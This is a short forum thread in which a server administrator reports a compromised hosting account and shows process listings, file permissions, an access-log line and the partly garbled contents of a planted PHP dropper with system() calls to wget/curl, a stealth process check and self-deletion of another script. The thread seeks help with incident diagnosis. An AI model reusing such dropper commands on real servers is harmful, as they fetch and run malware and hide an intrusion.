Strange programs running server
Folks,
How do I determine what these strange programs have been doing on my server?
root 9771 0.0 0.0 20164 1164 ? Ss Mar22 0:00 jailshell (username) [9817] l -c /home/username/public_html/Linux_amd64 > /dev/null 2>&1
username 9817 0.0 0.0 20164 268 ? S Mar22 0:42 jailshell (username) [init] l -c /home/jimhermann/public_html/Linux_amd64 > /dev/null 2>&1
They were saved to the hard drive by 550.php script. I ran chmod 000 after I found them.
----------. 1 username username 2228748 Mar 16 05:11 Linux_x86
----------. 1 username username 2377240 Mar 16 05:11 Linux_amd64
----------. 1 username username 453 Mar 22 08:49 550.php
It looks like files 412.php and 550.php were uploaded first before March, then 550.php was executed via http on March 22.
# more 550.php
" 2>/dev/null || curl -O "&1 &');
system('ps aux|stealth');
system('wget "/dev/null || curl -O "&1 &');
system('ps aux|grep stealth');
system('rm -rf 412.php');
?>
# grep 93.41.203.52 username.com-ssl_log-Mar-2022
93.41.203.52 - - [22/Mar/2022:09:25:57 -0500] "GET /550.php HTTP/1.1" 200 250 "-" "curl/7.52.1"
Imunify AV+ reported that the Linux_amd64 file was infected with SMW-BLKH-1421002-elf.troj
Thanks,
Jim
-
Hey there! The good news is that the compromise only appears to be at the user level, as the files were owned by the cPanel user and not root. If you do a search for "Linux_amd64 malware" you'll see many references to that tool, mostly about trying to capture network traffic to get sensitive data. 0 -
yeah, these accounts got hacked. :) 0
Please sign in to leave a comment.
Comments
2 comments